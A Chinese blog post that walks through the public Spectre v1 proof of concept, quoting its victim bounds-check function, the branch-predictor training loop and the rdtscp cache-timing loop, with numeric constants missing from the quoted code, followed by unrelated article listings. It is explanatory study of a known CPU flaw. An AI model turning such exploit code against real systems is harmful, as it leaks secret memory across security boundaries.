最近觉得越来越忙,写博客都没精力了。一定是太沉迷农药和刷即刻了……

17年年底,18年年初,Intel被爆出了Meltdown(熔断)和Spectre(幽灵)漏洞。等Spectre攻击的POC出来以后,去github围观了一下,真的非常精妙,好想贴上来分享一下。

  1. void victim_function(size_t x)
  2. {
  3.     if (x < array1_size)
  4.     {
  5.         temp &= array2[array1[x] * ];
  6.     }
  7. }

主要代码就在Source.c里面,实际生效的不到100行,真的很精致。victim_function是用来越权访问的,看代码是没有问题的,x不符合条件,就不能访问到对应的内存。但是因为分支预测器的原因,即使没有满足if的条件,若分支预测器觉得条件会成立,还是会一边执行if的条件判断,一边执行if内的代码。当然,判断if失败后,会将if内代码执行的结果抛弃掉的。妙就妙在这里,结果会被回滚,但是cache不会。于是只要测度array2哪里访问的比较快,就知道密文是什么了。

如何欺骗分支预测器呢?看这里:

  1.         /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
  2.         training_x = tries % array1_size;
  3.         for (j = ; j >= ; j--)
  4.         {
  5.             _mm_clflush(&array1_size);
  6.             for (volatile int z = ; z < ; z++)
  7.             {
  8.             } /* Delay (can also mfence) */
  9.  
  10.             /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
  11.             /* Avoid jumps in case those tip off the branch predictor */
  12.             x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
  13.             x = (x | (x >> )); /* Set x=-1 if j%6=0, else x=0 */
  14.             x = training_x ^ (x & (malicious_x ^ training_x));
  15.  
  16.             /* Call the victim! */
  17.             victim_function(x);
  18.         }

跑5次满足if条件的调用,再跑一次不满足if条件的攻击。中间用位运算是为了避免额外的if语句会触动分支预测器。

测时间的逻辑在这:

  1.         /* Time reads. Order is lightly mixed up to prevent stride prediction */
  2.         for (i = ; i < ; i++)
  3.         {
  4.             mix_i = ((i * ) + ) & ;
  5.             addr = &array2[mix_i * ];
  6.             time1 = __rdtscp(&junk); /* READ TIMER */
  7.             junk = *addr; /* MEMORY ACCESS TO TIME */
  8.             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
  9.             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
  10.                 results[mix_i]++; /* cache hit - add +1 to score for this value */
  11.         }

用到了高精度的rdtscp来计时,可以读入CPU计数器的读数。这里还硬编码了167和13进去,其实就是两个质数,目的就是让cache预读摸不着头脑,不会因为线性预读取干扰了测时。

为了对抗Spectre攻击,Google推出了Retpoline方法,涉及到对可执行文件的二进制修改,还没看懂。。。

Intel的CPU漏洞:Spectre的更多相关文章

  1. Intel CPU 漏洞分析

    Intel CPU漏洞分析报告 预备知识 存储分级 由于计算机存储分级的特性(第一级:寄存器,第二级:高速缓存,第三级:内存,第四级:磁盘),每一级之间的访问速度差距高达数量级.所以处理器会将用到的数 ...

  2. CPU漏洞补丁KB4056892 卸载及忽略办法

    2018.1.4微软发布了针对intel CPU漏洞的补丁 KB4056892 性能降低不说, 针对一般平民根本没多大意义, 另外还会导致一些软件无法正常使用, (我是使用蓝叠经典版, 启动就会蓝屏) ...

  3. Intel系列CPU的流水线技术的发展

    Intel系列CPU的流水线技术的发展 CPU(Central processing Unit),又称“微处理器(Microprocessor)”,是现代计算机的核心部件.对于PC而言,CPU的规格与 ...

  4. ARM CPU与Intel x86 CPU性能比较

    Qualcomm ARM CPU与Intel x86 CPU性能比较 随着移动互联网时代的到来,Qualcomm(高通).Texas Instruments(德州仪器)等基于ARM架构的CPU受到越来 ...

  5. AMD和Intel的CPU对比

    http://www.lotpc.com/yjzs/5825.html 推荐文章:小白看AMD与intel的cpu架构,AMD慢的原因 CPU核心的发展方向是更低的电压.更低的功耗.更先进的制造工艺. ...

  6. Intel X86 CPU 系列的寻址方式

    Intel X86 CPU 系列的寻址方式 数据总线和地址总线要尽量相同,这个是一个地址就是一个指针.

  7. 【漏洞预警】Intel爆CPU设计问题,导致win和Linux内核重设计(附测试poc)

    目前研究人员正抓紧检查 Linux 内核的安全问题,与此同时,微软也预计将在本月补丁日公开介绍 Windows 操作系统的相关变更. 而 Linux 和 Windows 系统的这些更新势必会对 Int ...

  8. intel服务器cpu命名规则

    我们以E3.E5.E7系列进行一个详细解析.首先,Intel E3.E5.E7代表了3个不同档次的至强CPU,至强"E系列"的这种命名方式有些类似桌面上的Core i3,i5,i7 ...

  9. Intel P4 CPU

    1. P4 CPU 结构 奔4处理器是Intel的经典之作,它是采用乱序执行内核的超标量处理器.P4采用的微架构称为 Net Burst,基本结构如下: 奔4处理器微架构被分成了4大部分: (1)存储 ...

随机推荐

  1. Vim 常用简单命令

    Vim中有三个模式,1.刚进入Vim画面的是命令模式,2. 在命令模式输入:进入末行模式, 3. 在命令模式输入 a或者i或者o进入编辑模式 在末行或者编辑模式中可以通过ESC回到命令模式 举例当前目 ...

  2. oracle如何创建存储过程和调用

    oracle存储过程的创建语法 create or replace procedure 存储过程名称 ( --定义输入.输出参数-- 参数名1 in 参数类型, 参数名2 in 参数类型, 参数名3 ...

  3. [Oracle][DATAGUARD] LOGICAL STANDBY环境里,有些SEQUENCE无法应用,导致Primary和Standby无法同期

    今天遇到了一个客户,问题是这样的,客户构筑了一个RACtoRAC的 LOGICAL STANDBY环境.并用EM在监视同期情况,发现EM页面上55115和55116这两个SEQUENCE一直在应用. ...

  4. python 全栈开发笔记 1

    将自己的姓名用进制表示出来 #自己姓名的进制表示 name=input('请输入你的名字:') for i in name: print(i) # python 3 中是按字符进行循环的 bytes_ ...

  5. 最佳sql server 分页查询

    用关键字查询 并作为条件是最快的,比其他嵌套select性能都要好 select top 100 id , name from tablex where id >preid order by i ...

  6. DevExpress v18.2新版亮点——DevExtreme篇(三)

    行业领先的.NET界面控件2018年第二次重大更新——DevExpress v18.2日前正式发布,本站将以连载的形式为大家介绍新版本新功能.本文将介绍了DevExtreme Complete Sub ...

  7. 通过sqlalchemy操作mysql

    # 安装 pip3 install sqlalchemy import sqlalchemy from sqlalchemy import create_enginefrom sqlalchemy.e ...

  8. tensorFlow可以运行的代码

    折腾了很久,终于运行成功. 才云科技的书不错,就是需要微调一二. 心得:1,记得activate tensorflow,然后再python 2,Python的代码格式很重要,不要错误. 3,还不清楚如 ...

  9. 为什么使用zookeeper?

    随着应用规模的迅速扩张,单台机器的部署已经难以支撑用户大规模.高并发的请求了, 因此服务化.集群化.分布式概念应运而生. 针对这种场景,人们通常使用的做法就是将软件按照模块进行拆分,形成独立的子系统, ...

  10. 最近在研究syslog日志,就说一下syslog格式吧

    syslog格式:<PRI>HEADER MESSAGE syslog的消息长度:不超过1024.syslog格式举例:<15>Jul 10 12:00:00 192.168. ...